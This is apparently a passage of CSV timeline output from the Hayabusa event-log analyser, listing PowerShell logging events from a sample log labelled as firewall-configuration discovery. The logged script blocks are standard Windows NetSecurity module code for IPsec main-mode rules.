+09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration 
enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { 
[object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType 
= 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value 
= ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value 
= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
